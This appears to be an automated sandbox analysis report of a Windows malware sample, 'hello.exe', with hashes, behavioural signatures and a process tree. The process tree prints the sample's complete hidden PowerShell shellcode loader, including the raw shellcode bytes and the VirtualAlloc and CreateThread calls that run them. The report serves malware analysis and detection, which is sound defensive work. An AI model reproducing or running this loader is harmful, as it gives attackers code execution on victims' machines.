Analysis
-
max time kernel
233s -
max time network
216s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
30/04/2024, 04:09
Static task
static1
Behavioral task
behavioral1
Sample
hello.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
hello.exe
Resource
win10-20240404-en
General
-
Target
hello.exe
-
Size
19KB
-
MD5
efe0d8e9ace006818f0cff13690c0d78
-
SHA1
f1020d62000df19d9c60af39cf8457b0ef35f69b
-
SHA256
3a80c99bb8fa69f219204912dbd54751fcef4100418731e897bf3a813bc833f8
-
SHA512
2466a98a0f0b8ae25f49d3f5649bd6151043d83fef0e8e35abc2e90977e48db8325aeea8fea3def2bad5f3b6be2fbc8f0d030fac198d8fc78d804c13bd57b1d6
-
SSDEEP
384:hEEoLO56ayzcMj+zdO/5qU9B3SDP/wgcYsINeWkoP73A:+E8O56lcVdwgc5INeO7w
Malware Config
Signatures
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133589239981297161" chrome.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4680 chrome.exe 4680 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe Token: SeShutdownPrivilege 4680 chrome.exe Token: SeCreatePagefilePrivilege 4680 chrome.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe 4680 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4704 wrote to memory of 4392 4704 hello.exe 73 PID 4704 wrote to memory of 4392 4704 hello.exe 73 PID 4680 wrote to memory of 1152 4680 chrome.exe 76 PID 4680 wrote to memory of 1152 4680 chrome.exe 76 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 4504 4680 chrome.exe 78 PID 4680 wrote to memory of 2832 4680 chrome.exe 79 PID 4680 wrote to memory of 2832 4680 chrome.exe 79 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80 PID 4680 wrote to memory of 4308 4680 chrome.exe 80
Processes
-
C:\Users\Admin\AppData\Local\Temp\hello.exe"C:\Users\Admin\AppData\Local\Temp\hello.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand $ t z m   =   ' $ X N H a   =   ' ' [ D l l I m p o r t ( " k e r n e l 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   V i r t u a l A l l o c ( I n t P t r   l p A d d r e s s ,   u i n t   d w S i z e ,   u i n t   f l A l l o c a t i o n T y p e ,   u i n t   f l P r o t e c t ) ; [ D l l I m p o r t ( " k e r n e l 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   C r e a t e T h r e a d ( I n t P t r   l p T h r e a d A t t r i b u t e s ,   u i n t   d w S t a c k S i z e ,   I n t P t r   l p S t a r t A d d r e s s ,   I n t P t r   l p P a r a m e t e r ,   u i n t   d w C r e a t i o n F l a g s ,   I n t P t r   l p T h r e a d I d ) ; [ D l l I m p o r t ( " m s v c r t . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   m e m s e t ( I n t P t r   d e s t ,   u i n t   s r c ,   u i n t   c o u n t ) ; ' ' ; $ w   =   A d d - T y p e   - m e m b e r D e f i n i t i o n   $ X N H a   - N a m e   " W i n 3 2 "   - n a m e s p a c e   W i n 3 2 F u n c t i o n s   - p a s s t h r u ; [ B y t e [ ] ] ; [ B y t e [ ] ] $ z   =   0 x d b , 0 x d e , 0 x b e , 0 x 2 9 , 0 x f c , 0 x d 4 , 0 x 7 4 , 0 x d 9 , 0 x 7 4 , 0 x 2 4 , 0 x f 4 , 0 x 5 8 , 0 x 3 3 , 0 x c 9 , 0 x b 1 , 0 x 6 3 , 0 x 3 1 , 0 x 7 0 , 0 x 1 a , 0 x 0 3 , 0 x 7 0 , 0 x 1 a , 0 x 8 3 , 0 x c 0 , 0 x 0 4 , 0 x e 2 , 0 x d c , 0 x 0 0 , 0 x 3 c , 0 x f b , 0 x 1 e , 0 x f 9 , 0 x b d , 0 x 6 4 , 0 x 2 f , 0 x 2 b , 0 x 3 4 , 0 x 8 1 , 0 x 2 b , 0 x 4 0 , 0 x 1 5 , 0 x 7 a , 0 x 3 8 , 0 x 0 4 , 0 x 9 6 , 0 x f 1 , 0 x 6 c , 0 x b d , 0 x a 9 , 0 x b 2 , 0 x d a , 0 x 9 b , 0 x 8 4 , 0 x 4 3 , 0 x 5 1 , 0 x 9 1 , 0 x c e , 0 x 8 a , 0 x a 5 , 0 x f a , 0 x 3 3 , 0 x 8 c , 0 x 5 9 , 0 x 0 1 , 0 x 6 0 , 0 x 6 e , 0 x 6 0 , 0 x c a , 0 x 7 5 , 0 x 6 f , 0 x a 5 , 0 x 9 c , 0 x f 0 , 0 x 8 0 , 0 x 7 b , 0 x 9 4 , 0 x a 9 , 0 x 4 e , 0 x 2 c , 0 x 2 1 , 0 x 0 f , 0 x 5 3 , 0 x d 3 , 0 x e 5 , 0 x 1 b , 0 x e b , 0 x a b , 0 x 8 0 , 0 x d c , 0 x 9 8 , 0 x 0 7 , 0 x 8 a , 0 x 0 c , 0 x e b , 0 x d f , 0 x 9 4 , 0 x f c , 0 x 6 7 , 0 x 8 7 , 0 x 8 4 , 0 x f d , 0 x a 4 , 0 x b 2 , 0 x 0 c , 0 x 8 9 , 0 x 7 6 , 0 x f 5 , 0 x 0 5 , 0 x 4 6 , 0 x 0 c , 0 x 3 4 , 0 x e 5 , 0 x a 6 , 0 x c 4 , 0 x 0 7 , 0 x d 9 , 0 x 6 8 , 0 x 2 7 , 0 x 6 a , 0 x 7 5 , 0 x 6 b , 0 x 7 f , 0 x 4 c , 0 x 6 5 , 0 x 1 9 , 0 x 8 b , 0 x a f , 0 x 1 8 , 0 x 1 a , 0 x 4 8 , 0 x d 2 , 0 x c 6 , 0 x a f , 0 x 4 f , 0 x 7 4 , 0 x 8 c , 0 x 0 8 , 0 x b 4 , 0 x 8 5 , 0 x 4 1 , 0 x c e , 0 x 3 f , 0 x 8 9 , 0 x 2 e , 0 x 8 4 , 0 x 1 8 , 0 x 8 d , 0 x b 1 , 0 x 4 9 , 0 x 1 3 , 0 x a 9 , 0 x 3 a , 0 x 6 c , 0 x f 4 , 0 x 3 8 , 0 x 7 8 , 0 x 4 b , 0 x d 0 , 0 x 6 1 , 0 x d a , 0 x f 2 , 0 x 4 1 , 0 x c f , 0 x 8 d , 0 x 0 b , 0 x 9 1 , 0 x b 7 , 0 x 7 2 , 0 x a e , 0 x d 9 , 0 x 5 5 , 0 x 6 4 , 0 x c e , 0 x 2 1 , 0 x a 6 , 0 x 8 9 , 0 x 9 2 , 0 x b 5 , 0 x 3 6 , 0 x 1 3 , 0 x 5 9 , 0 x 4 6 , 0 x a e , 0 x a c , 0 x c 8 , 0 x 2 8 , 0 x 4 7 , 0 x 0 7 , 0 x 6 3 , 0 x f 9 , 0 x e 0 , 0 x 8 1 , 0 x 7 4 , 0 x f e , 0 x d b , 0 x f f , 0 x a 1 , 0 x 5 3 , 0 x b 0 , 0 x a c , 0 x 0 6 , 0 x 0 7 , 0 x 5 e , 0 x 6 9 , 0 x f f , 0 x d e , 0 x 3 9 , 0 x 7 2 , 0 x 2 a , 0 x 7 3 , 0 x 1 6 , 0 x e 7 , 0 x d 6 , 0 x 2 7 , 0 x c b , 0 x 9 f , 0 x 7 6 , 0 x c f , 0 x e b , 0 x 5 f , 0 x 6 f , 0 x 6 0 , 0 x e b , 0 x 5 f , 0 x 6 f , 0 x a e , 0 x a e , 0 x 3 a , 0 x 2 9 , 0 x d c , 0 x 1 d , 0 x b 2 , 0 x 8 1 , 0 x 2 c , 0 x 0 5 , 0 x 5 0 , 0 x b d , 0 x 7 4 , 0 x e d , 0 x e 4 , 0 x 7 0 , 0 x e 1 , 0 x 3 f , 0 x 9 8 , 0 x 0 8 , 0 x b a , 0 x 6 d , 0 x 2 3 , 0 x 8 6 , 0 x 5 d , 0 x a 5 , 0 x e f , 0 x 3 b , 0 x c 4 , 0 x a 1 , 0 x e f , 0 x e b , 0 x 9 0 , 0 x 7 e , 0 x 7 9 , 0 x 9 4 , 0 x a 7 , 0 x 7 f , 0 x a c , 0 x 2 2 , 0 x e 1 , 0 x 2 c , 0 x 2 7 , 0 x 3 5 , 0 x d c , 0 x 3 a , 0 x 3 3 , 0 x 6 6 , 0 x 7 3 , 0 x e 9 , 0 x 6 b , 0 x d a , 0 x 2 5 , 0 x 6 5 , 0 x 7 f , 0 x 8 9 , 0 x e 7 , 0 x 4 e , 0 x 8 0 , 0 x e 7 , 0 x 6 e , 0 x d a , 0 x 7 4 , 0 x 5 7 , 0 x e 7 , 0 x 9 a , 0 x b a , 0 x 6 7 , 0 x f 7 , 0 x 1 3 , 0 x 5 c , 0 x 0 d , 0 x f 3 , 0 x 7 3 , 0 x f 7 , 0 x c d , 0 x a d , 0 x 1 b , 0 x 7 2 , 0 x b 4 , 0 x c f , 0 x 5 d , 0 x 8 3 , 0 x e d , 0 x a 3 , 0 x 3 2 , 0 x 2 f , 0 x 5 d , 0 x 1 2 , 0 x d c , 0 x e 2 , 0 x 6 7 , 0 x 8 2 , 0 x 6 7 , 0 x 0 2 , 0 x b 2 , 0 x 3 7 , 0 x 5 7 , 0 x 8 9 , 0 x 2 b , 0 x 5 0 , 0 x d f , 0 x 6 1 , 0 x 5 4 , 0 x a 0 , 0 x b 7 , 0 x c 1 , 0 x a 4 , 0 x 9 5 , 0 x a 7 , 0 x 3 5 , 0 x 9 1 , 0 x 9 9 , 0 x 5 2 , 0 x 0 7 , 0 x 7 2 , 0 x d 6 , 0 x 2 9 , 0 x 3 5 , 0 x d 5 , 0 x e 9 , 0 x 8 4 , 0 x 5 0 , 0 x 9 a , 0 x 7 d , 0 x 2 6 , 0 x b 5 , 0 x 1 a , 0 x 7 e , 0 x 4 e , 0 x b 5 , 0 x 1 a , 0 x 3 e , 0 x 8 e , 0 x e 6 , 0 x 7 2 , 0 x e 6 , 0 x 2 a , 0 x 5 b , 0 x 6 6 , 0 x e 9 , 0 x e 7 , 0 x c f , 0 x 3 b , 0 x 4 5 , 0 x 8 e , 0 x 1 7 , 0 x e c , 0 x 0 1 , 0 x 9 0 , 0 x f 7 , 0 x 1 3 , 0 x d 2 , 0 x c 3 , 0 x a 1 , 0 x 7 b , 0 x c 0 , 0 x 7 5 , 0 x c 4 , 0 x 9 e , 0 x 1 b , 0 x a c , 0 x 5 2 , 0 x 9 e , 0 x 9 0 , 0 x 8 3 , 0 x d 6 , 0 x 1 8 , 0 x 5 8 , 0 x d 8 , 0 x 6 c , 0 x e 6 , 0 x 2 f , 0 x 3 b , 0 x 3 6 , 0 x 2 4 , 0 x 9 0 , 0 x 2 b , 0 x a e , 0 x 5 5 , 0 x d 0 , 0 x 5 4 , 0 x 0 0 , 0 x 9 3 , 0 x 1 d , 0 x 8 4 , 0 x 5 2 , 0 x d 5 , 0 x 5 9 , 0 x f 6 , 0 x a c , 0 x 2 1 , 0 x b 4 , 0 x 3 7 , 0 x f f , 0 x 6 9 , 0 x c 8 ; $ g   =   0 x 1 0 0 0 ; i f   ( $ z . L e n g t h   - g t   0 x 1 0 0 0 ) { $ g   =   $ z . L e n g t h } ; $ J a X = $ w : : V i r t u a l A l l o c ( 0 , 0 x 1 0 0 0 , $ g , 0 x 4 0 ) ; f o r   ( $ i = 0 ; $ i   - l e   ( $ z . L e n g t h - 1 ) ; $ i + + )   { $ w : : m e m s e t ( [ I n t P t r ] ( $ J a X . T o I n t 3 2 ( ) + $ i ) ,   $ z [ $ i ] ,   1 ) } ; $ w : : C r e a t e T h r e a d ( 0 , 0 , $ J a X , 0 , 0 , 0 ) ; f o r   ( ; ; ) { S t a r t - s l e e p   6 0 } ; ' ; $ e   =   [ S y s t e m . C o n v e r t ] : : T o B a s e 6 4 S t r i n g ( [ S y s t e m . T e x t . E n c o d i n g ] : : U n i c o d e . G e t B y t e s ( $ t z m ) ) ; $ n x 7 V   =   " - e n c   " ; i f ( [ I n t P t r ] : : S i z e   - e q   8 ) { $ G 6 C V   =   $ e n v : S y s t e m R o o t   +   " \ s y s w o w 6 4 \ W i n d o w s P o w e r S h e l l \ v 1 . 0 \ p o w e r s h e l l " ; i e x   " &   $ G 6 C V   $ n x 7 V   $ e " } e l s e { ; i e x   " &   p o w e r s h e l l   $ n x 7 V   $ e " ; } 2⤵PID:4392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xac,0xd8,0x7ffb233f9758,0x7ffb233f9768,0x7ffb233f97782⤵PID:1152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=1808,i,8021099718661243953,1910969774159639513,131072 /prefetch:22⤵PID:4504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1876 --field-trial-handle=1808,i,8021099718661243953,1910969774159639513,131072 /prefetch:82⤵PID:2832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2092 --field-trial-handle=1808,i,8021099718661243953,1910969774159639513,131072 /prefetch:82⤵PID:4308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2892 --field-trial-handle=1808,i,8021099718661243953,1910969774159639513,131072 /prefetch:12⤵PID:1516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2916 --field-trial-handle=1808,i,8021099718661243953,1910969774159639513,131072 /prefetch:12⤵PID:1564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4372 --field-trial-handle=1808,i,8021099718661243953,1910969774159639513,131072 /prefetch:12⤵PID:2480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4568 --field-trial-handle=1808,i,8021099718661243953,1910969774159639513,131072 /prefetch:82⤵PID:4168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4700 --field-trial-handle=1808,i,8021099718661243953,1910969774159639513,131072 /prefetch:82⤵PID:1812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1808,i,8021099718661243953,1910969774159639513,131072 /prefetch:82⤵PID:3956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1808,i,8021099718661243953,1910969774159639513,131072 /prefetch:82⤵PID:4948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4976 --field-trial-handle=1808,i,8021099718661243953,1910969774159639513,131072 /prefetch:82⤵PID:1628
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:4888
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
371B
MD5572c9d88aa8111b011bfa28284495ccb
SHA147434df43e154476cc2872b22252c473e9df66f7
SHA256bc4fbba66c14a895fb3980f98e7c0df772f1743906b5d7cdc2273195734ec1c8
SHA512d6d28d8cd7cc7c2f6d735a445de4c7844215c4fb79f2e8c1c1265cc1a670883f32e70488d28a8831c620392d0d1515c9f18a808b2c8f5dba24a3e5a95a3bb20e
-
Filesize
5KB
MD5935541a50bd82cba8394dea7baa3fc18
SHA1e9c673591ba0a4892a75c17d5aac3600e171a3c9
SHA256cfa98e7bf6ab1a8fc55590acf50e4c2e8a47f72decc93b1569d5d36eae7ea17d
SHA512f1e343fa01aeadf388a5dfc0c34207cd190acc9a9f66cc40e9e1b7cececdfdd36e6fbdbfea1721b162ea3c72be5410df8504fedeaa5861f031ec298ff63241ae
-
Filesize
12KB
MD57d9316a57b3819ea8ac5768734bc7b04
SHA1222716ad2982ec822d3b4bd59447b36bc3b2af50
SHA2561ee200acfd4ce131cabc63558a14febd9cb6bb149b25d49d0ff63ba285771815
SHA51266296d839ca354e663b7e10be009b052362ef143998a55d8aac2d333e97d319f0d98d27ed3f5eb061542a5e300e706168263e20fa13520221df9b7d2a531672b
-
Filesize
273KB
MD567024c3ab9c638a1722b4f7d869e4332
SHA14f5ddba358d9ee834b4d85bf8f8c8d8581364fdb
SHA256c7b1034477985de81822a4341d78861ba8f8f33ea4918b01f829db6d142760a7
SHA512a9f3b98675d5ff7424fed633b8dbbdf86bf720a667dc105c4f7f9c1e96625ce18e35059c3141bbac88a751e15ca06a2858276fe22ef09ca9478a6c4d10b613cd
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd